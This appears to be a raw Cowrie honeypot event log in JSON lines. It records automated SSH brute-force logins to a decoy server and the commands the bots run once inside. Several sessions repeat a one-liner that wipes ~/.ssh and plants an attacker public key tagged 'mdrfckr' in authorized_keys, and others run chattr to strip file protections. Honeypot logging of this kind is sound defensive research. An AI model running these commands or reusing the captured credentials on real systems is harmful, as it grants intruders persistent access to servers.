{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.482856Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:07.790968Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.791766Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.942768Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:07.943793Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":55954,"dst_ip":"1.2.3.4","dst_port":22,"session":"d702f8b2602c","protocol":"ssh","message":"New connection: 5.202.105.236:55954 (1.2.3.4:22) [session: d702f8b2602c]","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.057922Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.081665Z","src_ip":"5.202.105.236","session":"d702f8b2602c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.217774Z","src_ip":"5.202.105.236","session":"d702f8b2602c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.775319Z","src_ip":"5.202.105.236","session":"d702f8b2602c"}
{"eventid":"cowrie.session.connect","src_ip":"43.156.132.147","src_port":45460,"dst_ip":"1.2.3.4","dst_port":22,"session":"3164676fd893","protocol":"ssh","message":"New connection: 43.156.132.147:45460 (1.2.3.4:22) [session: 3164676fd893]","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.923055Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:08.923720Z","src_ip":"43.156.132.147","session":"3164676fd893"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:09.176929Z","src_ip":"43.156.132.147","session":"3164676fd893"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:09.915252Z","src_ip":"5.202.105.236","session":"d702f8b2602c"}
{"eventid":"cowrie.session.connect","src_ip":"5.202.105.236","src_port":56446,"dst_ip":"1.2.3.4","dst_port":22,"session":"4a7a431f226c","protocol":"ssh","message":"New connection: 5.202.105.236:56446 (1.2.3.4:22) [session: 4a7a431f226c]","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.027946Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.057602Z","src_ip":"5.202.105.236","session":"4a7a431f226c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.200900Z","src_ip":"5.202.105.236","session":"4a7a431f226c"}
{"eventid":"cowrie.login.failed","username":"john","password":"1","message":"login attempt [john/1] failed","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.229859Z","src_ip":"43.156.132.147","session":"3164676fd893"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.755286Z","src_ip":"5.202.105.236","session":"4a7a431f226c"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.890409Z","src_ip":"5.202.105.236","session":"4a7a431f226c"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:10.898127Z","src_ip":"5.202.105.236","session":"9d12ae8b44d8"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:11.484916Z","src_ip":"43.156.132.147","session":"3164676fd893"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50404,"dst_ip":"1.2.3.4","dst_port":23,"session":"05158c07d469","protocol":"telnet","message":"New connection: 212.227.125.160:50404 (1.2.3.4:23) [session: 05158c07d469]","sensor":"my-vps","timestamp":"2025-09-09T00:56:22.446018Z"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":40422,"dst_ip":"1.2.3.4","dst_port":22,"session":"b418dbc8a4a5","protocol":"ssh","message":"New connection: 152.32.129.236:40422 (1.2.3.4:22) [session: b418dbc8a4a5]","sensor":"my-vps","timestamp":"2025-09-09T00:56:25.629954Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:25.630914Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:25.889115Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwer123456","message":"login attempt [root/Qwer123456] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:26.963101Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:27.528190Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:27.528902Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:27.529925Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:27.790224Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:28.379268Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T00:56:28.379968Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T00:56:28.640243Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:28.641077Z","src_ip":"152.32.129.236","session":"b418dbc8a4a5"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":40426,"dst_ip":"1.2.3.4","dst_port":22,"session":"138c4fd22039","protocol":"ssh","message":"New connection: 152.32.129.236:40426 (1.2.3.4:22) [session: 138c4fd22039]","sensor":"my-vps","timestamp":"2025-09-09T00:56:28.901001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:28.901690Z","src_ip":"152.32.129.236","session":"138c4fd22039"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:29.882276Z","src_ip":"152.32.129.236","session":"138c4fd22039"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T00:56:30.964072Z","src_ip":"152.32.129.236","session":"138c4fd22039"}
{"eventid":"cowrie.session.closed","duration":"3.3","message":"Connection lost after 3.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.226602Z","src_ip":"152.32.129.236","session":"138c4fd22039"}
{"eventid":"cowrie.session.connect","src_ip":"152.32.129.236","src_port":40436,"dst_ip":"1.2.3.4","dst_port":22,"session":"def9ff625420","protocol":"ssh","message":"New connection: 152.32.129.236:40436 (1.2.3.4:22) [session: def9ff625420]","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.370532Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.371308Z","src_ip":"152.32.129.236","session":"def9ff625420"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.573458Z","src_ip":"152.32.129.236","session":"def9ff625420"}
{"eventid":"cowrie.session.connect","src_ip":"51.250.72.176","src_port":47668,"dst_ip":"1.2.3.4","dst_port":22,"session":"44d43f1757dc","protocol":"ssh","message":"New connection: 51.250.72.176:47668 (1.2.3.4:22) [session: 44d43f1757dc]","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.855351Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.856788Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T00:56:32.896702Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.login.success","username":"root","password":"123qweasdZXC","message":"login attempt [root/123qweasdZXC] succeeded","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.097160Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:33.198133Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.198862Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.199748Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-09-09T00:56:33.241056Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T00:56:33.424631Z","src_ip":"51.250.72.176","session":"44d43f1757dc"}
